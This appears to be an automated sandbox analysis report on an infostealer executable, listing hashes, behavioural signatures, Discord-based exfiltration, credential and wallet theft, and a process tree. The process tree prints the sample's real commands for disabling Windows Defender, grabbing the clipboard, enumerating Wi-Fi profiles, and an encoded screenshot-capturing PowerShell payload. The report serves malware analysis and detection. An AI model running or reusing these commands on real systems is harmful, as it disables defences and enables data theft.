Analysis
-
max time kernel
13s -
max time network
15s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
17-08-2024 09:47
Behavioral task
behavioral1
Sample
open if you like men.exe
Resource
win11-20240802-en
General
-
Target
open if you like men.exe
-
Size
20.0MB
-
MD5
9e957472e1e7d9b1dad366514751b366
-
SHA1
6446b56a27f02db737946313b65b35da0dd8e67b
-
SHA256
d3e31e51245e3f11ef86da0eaa102d42bff525e431fa51543eade45f2d191576
-
SHA512
79382db19e9ad61e33320c32297f04839a18998b2012566ae58817a6ceb63ee1363d192f25833097a2707a6bffb894c7389181c6b8e90d64ed317c1fcdf03978
-
SSDEEP
98304:SHeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbBv9JTSPhlVtQo1fY:S+YmOshoKMuIkhVastRL5Di3tKBSPJY
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5300 powershell.exe 5360 powershell.exe 5060 powershell.exe 2800 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 952 cmd.exe 3836 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3064 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe 1240 open if you like men.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000100000002aaf4-21.dat upx behavioral1/memory/1240-24-0x00007FFD5E530000-0x00007FFD5EB19000-memory.dmp upx behavioral1/files/0x000300000002aae1-27.dat upx behavioral1/memory/1240-30-0x00007FFD737F0000-0x00007FFD73813000-memory.dmp upx behavioral1/memory/1240-32-0x00007FFD79910000-0x00007FFD7991F000-memory.dmp upx behavioral1/files/0x000100000002aaf2-31.dat upx behavioral1/files/0x000100000002aaec-38.dat upx behavioral1/memory/1240-40-0x00007FFD70E50000-0x00007FFD70E7D000-memory.dmp upx behavioral1/files/0x000300000002aae0-41.dat upx behavioral1/memory/1240-44-0x00007FFD752C0000-0x00007FFD752D9000-memory.dmp upx behavioral1/files/0x000100000002aaef-43.dat upx behavioral1/memory/1240-47-0x00007FFD6F450000-0x00007FFD6F473000-memory.dmp upx behavioral1/files/0x000100000002aaf7-46.dat upx behavioral1/memory/1240-49-0x00007FFD5E3B0000-0x00007FFD5E527000-memory.dmp upx behavioral1/files/0x000100000002aaee-50.dat upx behavioral1/files/0x000100000002aaf6-52.dat upx behavioral1/memory/1240-55-0x00007FFD79810000-0x00007FFD7981D000-memory.dmp upx behavioral1/memory/1240-54-0x00007FFD737D0000-0x00007FFD737E9000-memory.dmp upx behavioral1/files/0x000100000002aaf0-56.dat upx behavioral1/files/0x000100000002aaf1-58.dat upx behavioral1/files/0x000100000002aaf3-59.dat upx behavioral1/memory/1240-64-0x00007FFD6BEC0000-0x00007FFD6BEF3000-memory.dmp upx behavioral1/memory/1240-63-0x00007FFD5E530000-0x00007FFD5EB19000-memory.dmp upx behavioral1/memory/1240-67-0x00007FFD5E0B0000-0x00007FFD5E17D000-memory.dmp upx behavioral1/memory/1240-66-0x00007FFD5DB90000-0x00007FFD5E0B0000-memory.dmp upx behavioral1/files/0x000100000002aaeb-69.dat upx behavioral1/memory/1240-71-0x00007FFD738A0000-0x00007FFD738B4000-memory.dmp upx behavioral1/memory/1240-70-0x00007FFD737F0000-0x00007FFD73813000-memory.dmp upx behavioral1/files/0x000100000002aaed-72.dat upx behavioral1/memory/1240-74-0x00007FFD79910000-0x00007FFD7991F000-memory.dmp upx behavioral1/files/0x000100000002aaf8-76.dat upx behavioral1/memory/1240-75-0x00007FFD73BB0000-0x00007FFD73BBD000-memory.dmp upx behavioral1/memory/1240-79-0x00007FFD5E290000-0x00007FFD5E3AC000-memory.dmp upx behavioral1/memory/1240-78-0x00007FFD70E50000-0x00007FFD70E7D000-memory.dmp upx behavioral1/memory/1240-193-0x00007FFD6F450000-0x00007FFD6F473000-memory.dmp upx behavioral1/memory/1240-247-0x00007FFD5E3B0000-0x00007FFD5E527000-memory.dmp upx behavioral1/memory/1240-249-0x00007FFD737D0000-0x00007FFD737E9000-memory.dmp upx behavioral1/memory/1240-288-0x00007FFD6BEC0000-0x00007FFD6BEF3000-memory.dmp upx behavioral1/memory/1240-290-0x00007FFD5DB90000-0x00007FFD5E0B0000-memory.dmp upx behavioral1/memory/1240-291-0x00007FFD5E0B0000-0x00007FFD5E17D000-memory.dmp upx behavioral1/memory/1240-292-0x00007FFD5E530000-0x00007FFD5EB19000-memory.dmp upx behavioral1/memory/1240-298-0x00007FFD5E3B0000-0x00007FFD5E527000-memory.dmp upx behavioral1/memory/1240-293-0x00007FFD737F0000-0x00007FFD73813000-memory.dmp upx behavioral1/memory/1240-321-0x00007FFD5E290000-0x00007FFD5E3AC000-memory.dmp upx behavioral1/memory/1240-331-0x00007FFD6BEC0000-0x00007FFD6BEF3000-memory.dmp upx behavioral1/memory/1240-330-0x00007FFD5E0B0000-0x00007FFD5E17D000-memory.dmp upx behavioral1/memory/1240-332-0x00007FFD5DB90000-0x00007FFD5E0B0000-memory.dmp upx behavioral1/memory/1240-329-0x00007FFD737D0000-0x00007FFD737E9000-memory.dmp upx behavioral1/memory/1240-328-0x00007FFD5E3B0000-0x00007FFD5E527000-memory.dmp upx behavioral1/memory/1240-327-0x00007FFD6F450000-0x00007FFD6F473000-memory.dmp upx behavioral1/memory/1240-326-0x00007FFD752C0000-0x00007FFD752D9000-memory.dmp upx behavioral1/memory/1240-325-0x00007FFD70E50000-0x00007FFD70E7D000-memory.dmp upx behavioral1/memory/1240-324-0x00007FFD79910000-0x00007FFD7991F000-memory.dmp upx behavioral1/memory/1240-323-0x00007FFD737F0000-0x00007FFD73813000-memory.dmp upx behavioral1/memory/1240-322-0x00007FFD79810000-0x00007FFD7981D000-memory.dmp upx behavioral1/memory/1240-320-0x00007FFD73BB0000-0x00007FFD73BBD000-memory.dmp upx behavioral1/memory/1240-319-0x00007FFD738A0000-0x00007FFD738B4000-memory.dmp upx behavioral1/memory/1240-307-0x00007FFD5E530000-0x00007FFD5EB19000-memory.dmp upx -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1348 tasklist.exe 4900 tasklist.exe 5780 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2068 netsh.exe 2300 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4940 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2344 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 5360 powershell.exe 5300 powershell.exe 5300 powershell.exe 5360 powershell.exe 2204 powershell.exe 2204 powershell.exe 3836 powershell.exe 3836 powershell.exe 3836 powershell.exe 2204 powershell.exe 5060 powershell.exe 5060 powershell.exe 5088 powershell.exe 5088 powershell.exe 2800 powershell.exe 2800 powershell.exe 4464 powershell.exe 4464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5360 powershell.exe Token: SeDebugPrivilege 5300 powershell.exe Token: SeDebugPrivilege 4900 tasklist.exe Token: SeDebugPrivilege 1348 tasklist.exe Token: SeIncreaseQuotaPrivilege 3536 WMIC.exe Token: SeSecurityPrivilege 3536 WMIC.exe Token: SeTakeOwnershipPrivilege 3536 WMIC.exe Token: SeLoadDriverPrivilege 3536 WMIC.exe Token: SeSystemProfilePrivilege 3536 WMIC.exe Token: SeSystemtimePrivilege 3536 WMIC.exe Token: SeProfSingleProcessPrivilege 3536 WMIC.exe Token: SeIncBasePriorityPrivilege 3536 WMIC.exe Token: SeCreatePagefilePrivilege 3536 WMIC.exe Token: SeBackupPrivilege 3536 WMIC.exe Token: SeRestorePrivilege 3536 WMIC.exe Token: SeShutdownPrivilege 3536 WMIC.exe Token: SeDebugPrivilege 3536 WMIC.exe Token: SeSystemEnvironmentPrivilege 3536 WMIC.exe Token: SeRemoteShutdownPrivilege 3536 WMIC.exe Token: SeUndockPrivilege 3536 WMIC.exe Token: SeManageVolumePrivilege 3536 WMIC.exe Token: 33 3536 WMIC.exe Token: 34 3536 WMIC.exe Token: 35 3536 WMIC.exe Token: 36 3536 WMIC.exe Token: SeDebugPrivilege 5780 tasklist.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 3836 powershell.exe Token: SeIncreaseQuotaPrivilege 3536 WMIC.exe Token: SeSecurityPrivilege 3536 WMIC.exe Token: SeTakeOwnershipPrivilege 3536 WMIC.exe Token: SeLoadDriverPrivilege 3536 WMIC.exe Token: SeSystemProfilePrivilege 3536 WMIC.exe Token: SeSystemtimePrivilege 3536 WMIC.exe Token: SeProfSingleProcessPrivilege 3536 WMIC.exe Token: SeIncBasePriorityPrivilege 3536 WMIC.exe Token: SeCreatePagefilePrivilege 3536 WMIC.exe Token: SeBackupPrivilege 3536 WMIC.exe Token: SeRestorePrivilege 3536 WMIC.exe Token: SeShutdownPrivilege 3536 WMIC.exe Token: SeDebugPrivilege 3536 WMIC.exe Token: SeSystemEnvironmentPrivilege 3536 WMIC.exe Token: SeRemoteShutdownPrivilege 3536 WMIC.exe Token: SeUndockPrivilege 3536 WMIC.exe Token: SeManageVolumePrivilege 3536 WMIC.exe Token: 33 3536 WMIC.exe Token: 34 3536 WMIC.exe Token: 35 3536 WMIC.exe Token: 36 3536 WMIC.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeIncreaseQuotaPrivilege 1152 WMIC.exe Token: SeSecurityPrivilege 1152 WMIC.exe Token: SeTakeOwnershipPrivilege 1152 WMIC.exe Token: SeLoadDriverPrivilege 1152 WMIC.exe Token: SeSystemProfilePrivilege 1152 WMIC.exe Token: SeSystemtimePrivilege 1152 WMIC.exe Token: SeProfSingleProcessPrivilege 1152 WMIC.exe Token: SeIncBasePriorityPrivilege 1152 WMIC.exe Token: SeCreatePagefilePrivilege 1152 WMIC.exe Token: SeBackupPrivilege 1152 WMIC.exe Token: SeRestorePrivilege 1152 WMIC.exe Token: SeShutdownPrivilege 1152 WMIC.exe Token: SeDebugPrivilege 1152 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5640 wrote to memory of 1240 5640 open if you like men.exe 82 PID 5640 wrote to memory of 1240 5640 open if you like men.exe 82 PID 1240 wrote to memory of 3160 1240 open if you like men.exe 84 PID 1240 wrote to memory of 3160 1240 open if you like men.exe 84 PID 1240 wrote to memory of 6044 1240 open if you like men.exe 85 PID 1240 wrote to memory of 6044 1240 open if you like men.exe 85 PID 3160 wrote to memory of 5300 3160 cmd.exe 88 PID 3160 wrote to memory of 5300 3160 cmd.exe 88 PID 6044 wrote to memory of 5360 6044 cmd.exe 89 PID 6044 wrote to memory of 5360 6044 cmd.exe 89 PID 1240 wrote to memory of 5456 1240 open if you like men.exe 90 PID 1240 wrote to memory of 5456 1240 open if you like men.exe 90 PID 1240 wrote to memory of 5324 1240 open if you like men.exe 91 PID 1240 wrote to memory of 5324 1240 open if you like men.exe 91 PID 5324 wrote to memory of 1348 5324 cmd.exe 94 PID 5324 wrote to memory of 1348 5324 cmd.exe 94 PID 5456 wrote to memory of 4900 5456 cmd.exe 95 PID 5456 wrote to memory of 4900 5456 cmd.exe 95 PID 1240 wrote to memory of 1192 1240 open if you like men.exe 97 PID 1240 wrote to memory of 1192 1240 open if you like men.exe 97 PID 1240 wrote to memory of 952 1240 open if you like men.exe 98 PID 1240 wrote to memory of 952 1240 open if you like men.exe 98 PID 1240 wrote to memory of 5512 1240 open if you like men.exe 100 PID 1240 wrote to memory of 5512 1240 open if you like men.exe 100 PID 1240 wrote to memory of 3128 1240 open if you like men.exe 103 PID 1240 wrote to memory of 3128 1240 open if you like men.exe 103 PID 1240 wrote to memory of 2300 1240 open if you like men.exe 104 PID 1240 wrote to memory of 2300 1240 open if you like men.exe 104 PID 1240 wrote to memory of 5100 1240 open if you like men.exe 106 PID 1240 wrote to memory of 5100 1240 open if you like men.exe 106 PID 1240 wrote to memory of 4980 1240 open if you like men.exe 109 PID 1240 wrote to memory of 4980 1240 open if you like men.exe 109 PID 1192 wrote to memory of 3536 1192 cmd.exe 111 PID 1192 wrote to memory of 3536 1192 cmd.exe 111 PID 2300 wrote to memory of 2068 2300 cmd.exe 112 PID 2300 wrote to memory of 2068 2300 cmd.exe 112 PID 5512 wrote to memory of 5780 5512 cmd.exe 114 PID 5512 wrote to memory of 5780 5512 cmd.exe 114 PID 3128 wrote to memory of 2236 3128 cmd.exe 113 PID 3128 wrote to memory of 2236 3128 cmd.exe 113 PID 952 wrote to memory of 3836 952 cmd.exe 115 PID 952 wrote to memory of 3836 952 cmd.exe 115 PID 4980 wrote to memory of 2204 4980 cmd.exe 116 PID 4980 wrote to memory of 2204 4980 cmd.exe 116 PID 5100 wrote to memory of 2344 5100 cmd.exe 117 PID 5100 wrote to memory of 2344 5100 cmd.exe 117 PID 1240 wrote to memory of 2732 1240 open if you like men.exe 118 PID 1240 wrote to memory of 2732 1240 open if you like men.exe 118 PID 2732 wrote to memory of 4420 2732 cmd.exe 120 PID 2732 wrote to memory of 4420 2732 cmd.exe 120 PID 1240 wrote to memory of 3576 1240 open if you like men.exe 121 PID 1240 wrote to memory of 3576 1240 open if you like men.exe 121 PID 3576 wrote to memory of 6024 3576 cmd.exe 123 PID 3576 wrote to memory of 6024 3576 cmd.exe 123 PID 1240 wrote to memory of 4720 1240 open if you like men.exe 124 PID 1240 wrote to memory of 4720 1240 open if you like men.exe 124 PID 2204 wrote to memory of 5484 2204 powershell.exe 126 PID 2204 wrote to memory of 5484 2204 powershell.exe 126 PID 4720 wrote to memory of 1376 4720 cmd.exe 155 PID 4720 wrote to memory of 1376 4720 cmd.exe 155 PID 1240 wrote to memory of 1036 1240 open if you like men.exe 128 PID 1240 wrote to memory of 1036 1240 open if you like men.exe 128 PID 1036 wrote to memory of 1756 1036 cmd.exe 130 PID 1036 wrote to memory of 1756 1036 cmd.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\open if you like men.exe"C:\Users\Admin\AppData\Local\Temp\open if you like men.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5640 -
C:\Users\Admin\AppData\Local\Temp\open if you like men.exe"C:\Users\Admin\AppData\Local\Temp\open if you like men.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\open if you like men.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\open if you like men.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:6044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5456 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5324 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5512 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1A